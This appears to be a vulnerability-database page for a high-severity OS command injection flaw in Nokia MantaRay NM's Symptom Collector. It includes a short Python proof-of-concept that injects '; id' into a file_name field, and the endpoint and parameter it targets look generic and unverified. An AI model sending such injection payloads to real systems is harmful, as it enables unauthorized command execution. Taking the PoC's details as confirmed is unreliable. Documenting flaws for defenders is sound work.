Security Vulnerability Report
CVE-2025-24817 CVSS 8.0 HIGH

Published: 2026-04-07 16:16:23
Last Modified: 2026-04-22 18:54:10
Source: b48c3b8f-639e-4c16-8725-497bc411dad0

Description

Nokia MantaRay NM is vulnerable to OS command injection due to improper neutralization of special elements used in an OS command in the Symptom Collector application.

CVSS Details

CVSS Score: 8.0
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nokia:mantaray_nm:*:*:*:*:*:*:*:* - VULNERABLE
Nokia MantaRay NM (for the specific affected versions, refer to Nokia's official security advisory)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL of the vulnerable Symptom Collector application
target_url = "http://<target_ip>:<port>/api/symptom"

# Attacker's controlled input with command injection payload
# Example payload: ; id to execute the 'id' command
payload_data = {
    "file_name": "/var/log/syslog; id"
}

try:
    # Send POST request to trigger the vulnerability
    response = requests.post(target_url, data=payload_data, timeout=10)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Check if the OS command was executed on the target.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

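References

https://www.nokia.com/we-are-nokia/security/product-security-advisory/cve-2025-24817/ (Vendor Advisory)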

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-24817", "sourceIdentifier": "b48c3b8f-639e-4c16-8725-497bc411dad0", "published": "2026-04-07T16:16:22.690", "lastModified": "2026-04-22T18:54:09.863", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nokia MantaRay NM is vulnerable to an OS command injection vulnerability due to improper neutralization of special elements used in an OS command in Symptom Collector application."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nokia:mantaray_nm:*:*:*:*:*:*:*:*", "versionEndExcluding": "25r1-nm", "matchCriteriaId": "C678CD07-A42D-4168-8852-9C232E8DA11B"}]}]}], "references": [{"url": "https://www.nokia.com/we-are-nokia/security/product-security-advisory/cve-2025-24817/", "source": "b48c3b8f-639e-4c16-8725-497bc411dad0", "tags": ["Vendor Advisory"]}]}}